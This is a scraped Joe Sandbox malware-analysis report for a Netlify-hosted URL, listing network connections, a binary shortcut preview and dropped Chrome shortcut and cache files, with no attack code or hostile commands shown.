Preview:	L..................F.@.. ...$+.,....s$...d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 01:32:41.663851976 CET	49675	443	192.168.2.5	23.1.237.91
Jan 12, 2025 01:32:41.663873911 CET	49674	443	192.168.2.5	23.1.237.91
Jan 12, 2025 01:32:41.757611036 CET	49673	443	192.168.2.5	23.1.237.91
Jan 12, 2025 01:32:51.265007973 CET	49675	443	192.168.2.5	23.1.237.91
Jan 12, 2025 01:32:51.265019894 CET	49674	443	192.168.2.5	23.1.237.91
Jan 12, 2025 01:32:51.358659983 CET	49673	443	192.168.2.5	23.1.237.91
Jan 12, 2025 01:32:52.742818117 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:52.742881060 CET	443	49711	172.217.18.4	192.168.2.5
Jan 12, 2025 01:32:52.743094921 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:52.743339062 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:52.743351936 CET	443	49711	172.217.18.4	192.168.2.5
Jan 12, 2025 01:32:52.992012024 CET	443	49703	23.1.237.91	192.168.2.5
Jan 12, 2025 01:32:52.992172956 CET	49703	443	192.168.2.5	23.1.237.91
Jan 12, 2025 01:32:53.404241085 CET	443	49711	172.217.18.4	192.168.2.5
Jan 12, 2025 01:32:53.405162096 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:53.405186892 CET	443	49711	172.217.18.4	192.168.2.5
Jan 12, 2025 01:32:53.406331062 CET	443	49711	172.217.18.4	192.168.2.5
Jan 12, 2025 01:32:53.406423092 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:53.407645941 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:53.407716036 CET	443	49711	172.217.18.4	192.168.2.5
Jan 12, 2025 01:32:53.452230930 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:53.452250957 CET	443	49711	172.217.18.4	192.168.2.5
Jan 12, 2025 01:32:53.499118090 CET	49711	443	192.168.2.5	172.217.18.4
Jan 12, 2025 01:32:54.350883007 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.350908041 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.350974083 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.351701021 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.351711988 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.353817940 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.353862047 CET	443	49715	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.353935003 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.354600906 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.354626894 CET	443	49715	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.993710041 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.993992090 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.994052887 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.995724916 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.995806932 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.996479034 CET	443	49715	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.996793032 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:54.996834040 CET	443	49715	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.998332024 CET	443	49715	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:54.998415947 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.000070095 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.000164986 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.000231981 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.000380039 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.000396967 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.000457048 CET	443	49715	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.046010971 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.046034098 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.046056986 CET	443	49715	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.095568895 CET	49715	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.474730015 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.474864960 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.474942923 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.474984884 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.475040913 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.475050926 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.475070000 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.475131989 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.475146055 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.475254059 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.475328922 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.476008892 CET	49714	443	192.168.2.5	3.125.36.175
Jan 12, 2025 01:32:55.476036072 CET	443	49714	3.125.36.175	192.168.2.5
Jan 12, 2025 01:32:55.503772020 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:55.503801107 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:55.504060030 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:55.504359007 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:55.504369020 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:55.525398970 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:55.525443077 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:55.525557041 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:55.525707960 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:55.525723934 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.001394987 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.001812935 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.001837015 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.003246069 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.003333092 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.004765987 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.004843950 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.005075932 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.005083084 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.047821999 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.101835012 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.102099895 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.102128029 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.103076935 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.103142977 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.104151964 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.104223967 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.116163969 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.116198063 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.156644106 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.162796974 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.162847996 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.162877083 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.162895918 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.162906885 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.162947893 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.162987947 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.163005114 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.163085938 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.163095951 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.163346052 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.163465977 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.163480997 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.163487911 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.163537025 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.167587996 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.208513975 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.208520889 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.212256908 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.212492943 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.212557077 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.212635994 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.212660074 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.212888002 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.212893963 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.212918043 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.212975025 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.216236115 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.216367006 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.216433048 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.216437101 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.216463089 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.217297077 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.217349052 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.217365026 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.217385054 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.217434883 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.250058889 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250099897 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250138044 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250202894 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250318050 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.250318050 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.250329018 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250492096 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250529051 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250566006 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250593901 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250605106 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.250606060 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.250612020 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.250900984 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.251254082 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.251290083 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.251336098 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.251348019 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.251353979 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.251379967 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.251463890 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.251581907 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.251586914 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252051115 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252087116 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252126932 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252162933 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252163887 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.252163887 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.252176046 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252233982 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252341986 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.252348900 CET	443	49717	104.18.11.207	192.168.2.5
Jan 12, 2025 01:32:56.252393961 CET	49717	443	192.168.2.5	104.18.11.207
Jan 12, 2025 01:32:56.272115946 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.272146940 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.299386978 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.299465895 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.299482107 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.299510002 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.299561024 CET	49718	443	192.168.2.5	199.232.196.193
Jan 12, 2025 01:32:56.299588919 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.299834013 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.299917936 CET	443	49718	199.232.196.193	192.168.2.5
Jan 12, 2025 01:32:56.299978

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://heuristic-knuth-588d37.netlify.app/?naps/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Windows Analysis Report
https://heuristic-knuth-588d37.netlify.app/?naps/